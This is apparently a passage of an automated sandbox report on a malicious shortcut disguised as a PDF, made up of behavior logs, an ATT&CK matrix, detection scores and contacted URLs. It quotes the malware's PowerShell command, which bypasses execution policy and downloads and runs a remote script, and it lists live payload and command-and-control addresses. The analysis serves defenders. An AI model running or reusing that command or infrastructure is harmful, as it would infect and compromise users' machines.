Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3988Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5901Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeWindow / User API: threadDelayed 9727Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeAPI coverage: 4.8 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep time: -9223372036854770s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 8024Thread sleep count: 256 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 8024Thread sleep time: -256000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 8024Thread sleep count: 9727 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 8024Thread sleep time: -9727000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AF7470 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,4_2_00007FFDF3AF7470
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AEB9F0 GetSystemInfo,4_2_00007FFDF3AEB9F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: Onedrive.exe, 00000004.00000003.3901060263.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873360667.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294687341.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2142989813.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2465823286.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000002.4145437606.000001729C0A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Onedrive.exe, 00000004.00000003.3901060263.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873360667.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294687341.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2142989813.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2465823286.000001729C124000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWi
Source: powershell.exe, 00000002.00000002.1858264293.0000025EE8E5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AD2830 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFDF3AD2830
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AD1010 CreateFileA,GetFileSize,VirtualAlloc,ReadFile,CloseHandle,LoadLibraryW,GetProcAddress,VirtualFree,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,SleepEx,SleepEx,VirtualFree,CloseHandle,4_2_00007FFDF3AD1010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA1C7F4 memset,GetProcessHeap,HeapFree,4_2_00007FF63EA1C7F4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA1EBD0 SetUnhandledExceptionFilter,4_2_00007FF63EA1EBD0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA1E8BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF63EA1E8BC
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AD3190 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFDF3AD3190
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AD2830 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFDF3AD2830
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AEDC60 __crtCaptureCurrentContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFDF3AEDC60

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
Sets debug register (to hijack the execution of another thread)
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeThread register set: 8020 1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Onedrive.exe "C:\Users\user\AppData\Local\Temp\Onedrive.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3B0E310 cpuid 4_2_00007FFDF3B0E310
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA19CD8 GetSystemTime,SystemTimeToFileTime,GetLastError,SLGetWindowsInformation,LocalFree,GetProcessHeap,HeapFree,4_2_00007FF63EA19CD8
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA11F10 StrToID,?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z,?AddListener@Element@DirectUI@@QEAAJPEAUIElementListener@2@@Z,4_2_00007FF63EA11F10

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
DLL Side-Loading		111
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory1
Query Registry		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
Process Injection		Security Account Manager21
Security Software Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS11
Process Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Obfuscated Files or Information		LSA Secrets21
Virtualization/Sandbox Evasion		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Timestomp		Cached Domain Credentials1
Application Window Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk15%VirustotalBrowse
Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk13%ReversingLabs
Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\Onedrive.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\sppc.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://47.84.196.148:443/reports-0%Avira URL Cloudsafe
https://47.84.196.148/xC0%Avira URL Cloudsafe
https://bangla.b-cdn.net/sppc.dll0%Avira URL Cloudsafe
https://47.84.196.148/0%Avira URL Cloudsafe
http://bangla.b-cdn.net0%Avira URL Cloudsafe
https://47.84.196.148:443/reports0%Avira URL Cloudsafe
https://47.84.196.148/3Y0%Avira URL Cloudsafe
https://47.84.196.148/reports0%Avira URL Cloudsafe
http://bangla.b-cdn.net/sppc.dll0%Avira URL Cloudsafe
https://47.84.196.148/Z0%Avira URL Cloudsafe
https://47.84.196.148/reportsr0%Avira URL Cloudsafe
http://bangla.b-cdn.net/onedrive.dll0%Avira URL Cloudsafe
https://47.84.196.148/reports30%Avira URL Cloudsafe
https://47.84.196.148/80%Avira URL Cloudsafe
https://bangla.b-cdn.net/onedrive.dll0%Avira URL Cloudsafe
https://bangla.b-cdn.net0%Avira URL Cloudsafe
https://47.84.196.148/reportsC0%Avira URL Cloudsafe
https://bangla.b-cdn.net/g1.ps10%Avira URL Cloudsafe
http://bangla.b-cdn.net/g1.ps10%Avira URL Cloudsafe
https://47.84.196.148/reportsG0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bangla.b-cdn.net
89.35.237.170
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://bangla.b-cdn.net/sppc.dllfalse
    • Avira URL Cloud: safe
    		unknown
    https://47.84.196.148/reportstrue
    • Avira URL Cloud: safe
    		unknown
    https://bangla.b-cdn.net/onedrive.dllfalse
    • Avira URL Cloud: safe
    		unknown
    https://bangla.b-cdn.net/g1.ps1false
    • Avira URL Cloud: safe
    		unknown
    http://bangla.b-cdn.net/g1.ps1false
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://47.84.196.148:443/reports-Onedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1851578383.0000025E90075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://47.84.196.148/xCOnedrive.exe, 00000004.00000003.2872607914.000001729C167000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2872000136.000001729C167000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873770232.000001729C167000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://schemas.micOnedrive.exefalse
        		high
        https://47.84.196.148/Onedrive.exe, 00000004.00000003.3900847973.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744954721.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294391353.000001729C166000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2644040219.000001729C142000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2456893874.000001729C163000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744733944.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3293582423.000001729C162000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2142971553.000001729C164000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2643148332.000001729C166000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2465823286.000001729C124000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1836408156.0000025E80232000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1836408156.0000025E80232000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://go.micropowershell.exe, 00000002.00000002.1836408156.0000025E80C32000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://47.84.196.148/ZOnedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.microsoft.copowershell.exe, 00000002.00000002.1859298060.0000025EE8F2C000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2871361393.000001729C172000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873861146.000001729C175000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2872607914.000001729C172000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873770232.000001729C172000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://47.84.196.148/3YOnedrive.exe, 00000004.00000003.3900847973.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744954721.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744733944.000001729C17A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://bangla.b-cdn.netpowershell.exe, 00000002.00000002.1836408156.0000025E80C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E81A54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E81602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E816F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E815E5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://47.84.196.148:443/reportsOnedrive.exe, 00000004.00000003.3901060263.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3901159878.000001729C12E000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3901025461.000001729C0DC000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873981465.000001729C0DC000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000002.4145437606.000001729C0A8000.00000004.00000020.00020000.00000000.sdmpfalse
